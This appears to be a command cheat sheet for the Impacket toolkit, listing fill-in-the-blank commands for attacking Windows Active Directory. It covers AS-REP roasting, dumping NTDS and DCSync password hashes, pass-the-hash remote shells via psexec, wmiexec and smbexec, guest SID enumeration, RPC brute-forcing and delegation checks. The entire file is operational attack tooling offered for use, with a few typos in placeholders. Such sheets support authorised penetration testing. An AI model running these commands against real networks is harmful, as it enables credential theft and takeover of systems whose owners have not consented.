impacket.cheat

% roasting, active-directory

# Get all hash of domain (no preauth roasting)
GetNPUsers.py <domain>/<user> -request -no-pass -dc-ip <ip> -format <hashcat_john>

# Get user hash from users file (no preauth roasting)
GetNPUsers.py -no-pass -dc-ip <ip> -usersfile <usersfile> <domain>/ -request -format <hashcat_john>

# Get hash for a user (no preauth roasting)
GetNPUsers.py -no-pass -dc-ip <ip> <domain>/<user> -request -format <hashcat_john>

% rpc

# RPC info
rpcmap.py 'ncacn_ip_tcp:<ip>'

# RPC bruteforce
rpcmap.py 'ncacn_ip_tcp:<ip>' -brute-uuids -brute-opnums -auth-level 1 -opnum-max 5

% hash, ntds, active-directory

# Show info of ntds file
secretsdump.py -pwd-last-set -user-status -history -ntds <ntds.dit> -security SECURITY -system SYSTEM local

# Get ntds.dit secrets
secretsdump.py -hashes <ntlmhash>:<ntlmhash> '<user>'@<target>

# Get all secrets a user as access from a dc
secretsdump.py -just-dc <user>

# GetChangesAll perm: DCSync attack to dump all ntlm hashes
secretsdump.py -dc-ip <dc> <domain>/<user>:<passwor>@<dc>

% registry

# Query Windows registry from linux
reg.py -hashes <hash< <domain>/<user> query -keyName HKU\\

% connection, cmd

# ps cmd console remote connection
psexec.py -hashes <ntlmhash>:<ntlmhash> <user>@<target> cmd

# wmi cmd console remote connection
wmiexec.py -hashes <ntlmhash>:<ntlmhash> <user>@<target> cmd

%rdp

# rdp cred check
rdp_check <domain>/<name>:<password>@<IP>

% mssql

# Get a mssql shell
mssqlclient.py <user>@<target>

% smb

# enumerate user via smb with guest
lookupsid.py guest@<target>

# Connect to target as smb share
smbclient.py <user>:<pass>@<target>

# Get semi-interactive shell to execute command
smbexec.py -hashes :<hash> <user>@<target>

% delegation

# check for constrained/unconstrained delegations
findDelegation.py <user>:<pass> -dc-ip <dcip>